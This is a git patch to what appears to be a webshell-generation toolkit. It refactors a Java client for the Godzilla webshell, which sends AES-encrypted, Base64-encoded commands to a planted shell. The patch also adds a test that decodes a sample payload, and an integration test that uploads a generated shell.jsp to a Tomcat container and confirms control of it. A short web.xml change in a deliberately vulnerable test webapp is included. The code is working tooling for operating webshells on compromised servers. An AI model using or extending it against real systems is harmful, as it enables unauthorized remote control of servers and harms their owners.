From 272188a83d8ce889ba72a859ca514d7e41b47dba Mon Sep 17 00:00:00 2001 From: ReaJason Date: Wed, 27 Nov 2024 01:17:08 +0800 Subject: [PATCH] fix: godzilla manager test failed --- .../javaweb/godzilla/GodzillaManager.java | 50 +++++++++++-------- .../javaweb/godzilla/GodzillaManagerTest.java | 10 ++++ .../TomcatGodzillaIntegrationTest.java | 6 +-- vul-webapp/src/main/webapp/WEB-INF/web.xml | 16 +++--- 4 files changed, 50 insertions(+), 32 deletions(-) diff --git a/generator/src/main/java/com/reajason/javaweb/godzilla/GodzillaManager.java b/generator/src/main/java/com/reajason/javaweb/godzilla/GodzillaManager.java index f0d2c2b..238846c 100644 --- a/generator/src/main/java/com/reajason/javaweb/godzilla/GodzillaManager.java +++ b/generator/src/main/java/com/reajason/javaweb/godzilla/GodzillaManager.java @@ -29,7 +29,7 @@ public class GodzillaManager implements Closeable { private final OkHttpClient client; private static final List CLASS_NAMES; - private String J_SESSION_ID = ""; + private String cookie = ""; private String entrypoint; private String key; private String pass; @@ -96,18 +96,18 @@ public GodzillaManager() { } private Response post(byte[] bytes) throws IOException { - byte[] aes = aes(bytes, true); + byte[] aes = aes(this.key, bytes, true); assert aes != null; String base64String = Base64.encodeBase64String(aes); RequestBody requestBody = new FormBody.Builder() - .add("pass", base64String) + .add(this.pass, base64String) .build(); Request.Builder builder = new Request.Builder() .url(this.entrypoint) .post(requestBody) .headers(Headers.of(this.headers)); - if (StringUtils.isNotBlank(J_SESSION_ID)) { - builder.header("Cookie", J_SESSION_ID); + if (StringUtils.isNotBlank(cookie)) { + builder.header("Cookie", cookie); } return client.newCall(builder.build()).execute(); } @@ -128,7 +128,7 @@ public boolean start() { try (Response response = post(bytes)) { String setCookie = response.header("Set-Cookie"); if (setCookie != null && setCookie.contains("JSESSIONID=")) { - J_SESSION_ID = setCookie.substring(setCookie.indexOf("JSESSIONID="), setCookie.indexOf(";")); + cookie = setCookie.substring(setCookie.indexOf("JSESSIONID="), setCookie.indexOf(";")); } return response.code() == 200; } catch (IOException e) { @@ -148,7 +148,6 @@ public boolean test() { } return false; } catch (IOException e) { - e.printStackTrace(); return false; } } @@ -172,15 +171,13 @@ public void close() throws IOException { * @param encoding 是否为加密,true 为加密,false 解密 * @return 返回加解密后的字节数组 */ - public byte[] aes(byte[] bytes, boolean encoding) { - System.out.println(key); + public static byte[] aes(String key, byte[] bytes, boolean encoding) { try { Cipher c = Cipher.getInstance("AES"); - c.init(encoding ? 1 : 2, new SecretKeySpec(this.key.getBytes(), "AES")); + c.init(encoding ? 1 : 2, new SecretKeySpec(key.getBytes(), "AES")); return c.doFinal(bytes); } catch (Exception e) { - e.printStackTrace(); - return null; + return new byte[0]; } } @@ -188,23 +185,34 @@ private boolean isValidResponse(String response) { if (StringUtils.isEmpty(response)) { return false; } - return response.startsWith(md5.substring(0, 16)) && response.endsWith(md5.substring(16)); + return response.length() > 32 && response.startsWith(md5.substring(0, 16)) && response.endsWith(md5.substring(16)); } public String getResultFromRes(String responseBody) throws IOException { + if (!isValidResponse(responseBody)) { + return responseBody; + } String result = responseBody.substring(16); result = result.substring(0, result.length() - 16); byte[] bytes = Base64.decodeBase64(result); - byte[] x = aes(bytes, false); + byte[] x = aes(this.key, bytes, false); GZIPInputStream gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(x)); return IOUtils.toString(gzipInputStream, StandardCharsets.UTF_8); } - Map restorePayload(String payload) throws IOException { - String p = URLDecoder.decode(payload, "UTF-8"); + public static Map restorePayload(String key, String payload) { + String p = payload; + try { + String urlDecoded = URLDecoder.decode(payload, "UTF-8"); + if (StringUtils.isNoneBlank(urlDecoded)) { + p = urlDecoded; + } + } catch (UnsupportedEncodingException ignored) { + + } Map map = new HashMap<>(); byte[] bytes = Base64.decodeBase64(p); - byte[] x = aes(bytes, false); + byte[] x = aes(key, bytes, false); ByteArrayInputStream tStream = new ByteArrayInputStream(x); ByteArrayOutputStream tp = new ByteArrayOutputStream(); byte[] lenB = new byte[4]; @@ -215,8 +223,8 @@ Map restorePayload(String payload) throws IOException { byte t = (byte) inputStream.read(); if (t != -1) { if (t == 2) { - String key = tp.toString(); - int read1 = inputStream.read(lenB); + String dataKey = tp.toString(); + inputStream.read(lenB); int len = bytesToInt(lenB); byte[] data = new byte[len]; int readOneLen = 0; @@ -224,7 +232,7 @@ Map restorePayload(String payload) throws IOException { read = readOneLen + inputStream.read(data, readOneLen, data.length - readOneLen); readOneLen = read; } while (read < data.length); - map.put(key, new String(data)); + map.put(dataKey, new String(data)); tp.reset(); } else { tp.write(t); @@ -249,7 +257,7 @@ public static int bytesToInt(byte[] bytes) { private byte[] generateMethodCallBytes(String methodName) { ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); try (GZIPOutputStream gzipOutputStream = new GZIPOutputStream(byteArrayOutputStream);) { - byte[] value = "close".getBytes(); + byte[] value = methodName.getBytes(); gzipOutputStream.write("methodName".getBytes()); gzipOutputStream.write(2); gzipOutputStream.write(intToBytes(value.length)); diff --git a/generator/src/test/java/com/reajason/javaweb/godzilla/GodzillaManagerTest.java b/generator/src/test/java/com/reajason/javaweb/godzilla/GodzillaManagerTest.java index c38e5aa..13eb13e 100644 --- a/generator/src/test/java/com/reajason/javaweb/godzilla/GodzillaManagerTest.java +++ b/generator/src/test/java/com/reajason/javaweb/godzilla/GodzillaManagerTest.java @@ -3,6 +3,8 @@ import com.reajason.javaweb.util.ClassUtils; import org.junit.jupiter.api.Test; +import java.util.Map; + import static org.junit.jupiter.api.Assertions.*; /** @@ -18,4 +20,12 @@ void generateGodzilla() { System.out.println(o.getClass().getName()); assertNotNull(o); } + + @Test + void testRestorePayload(){ + String payload = "k2qs7l3%2F4ZZaGyyrfpBQGg0dXGM%2BFVFxzmCWLnyFEgoPSpSjHre4o1HBHTCFnNDX"; + String key = "d8ea7326e6ec5916"; + Map map = GodzillaManager.restorePayload(key, payload); + assertEquals("test", map.get("methodName")); + } } \ No newline at end of file diff --git a/generator/src/test/java/com/reajason/javaweb/memsell/tomcat/godzilla/TomcatGodzillaIntegrationTest.java b/generator/src/test/java/com/reajason/javaweb/memsell/tomcat/godzilla/TomcatGodzillaIntegrationTest.java index ddb286a..ef36d62 100644 --- a/generator/src/test/java/com/reajason/javaweb/memsell/tomcat/godzilla/TomcatGodzillaIntegrationTest.java +++ b/generator/src/test/java/com/reajason/javaweb/memsell/tomcat/godzilla/TomcatGodzillaIntegrationTest.java @@ -52,8 +52,8 @@ private DynamicTest createCustomContainerTest(String imageName) { int port = container.getMappedPort(8080); String url = "http://" + host + ":" + port + "/app"; GodzillaShellConfig shellConfig = GodzillaShellConfig.builder() - .pass("pass").key("key") - .headerName("User-Agent").headerValue("test") + .pass("pass123").key("key123") + .headerName("User-Agent").headerValue("hello_integration_test") .build(); String jspContent = generateGodzillaFilterJsp(shellConfig); String filename = "shell.jsp"; @@ -99,7 +99,7 @@ private void uploadJspFileToServer(String uploadUrl, String filename, String fil } private void testGodzillaIsOk(String entrypoint, GodzillaShellConfig shellConfig) { - try (GodzillaManager godzillaManager = new GodzillaManager.GodzillaManagerBuilder() + try (GodzillaManager godzillaManager = GodzillaManager.builder() .entrypoint(entrypoint) .pass(shellConfig.getPass()) .key(shellConfig.getKey()) diff --git a/vul-webapp/src/main/webapp/WEB-INF/web.xml b/vul-webapp/src/main/webapp/WEB-INF/web.xml index bff571d..9fa4775 100644 --- a/vul-webapp/src/main/webapp/WEB-INF/web.xml +++ b/vul-webapp/src/main/webapp/WEB-INF/web.xml @@ -24,12 +24,12 @@ /upload - - godzilla - ErrorHandler - - - godzilla - /test_filter - + + + + + + + + \ No newline at end of file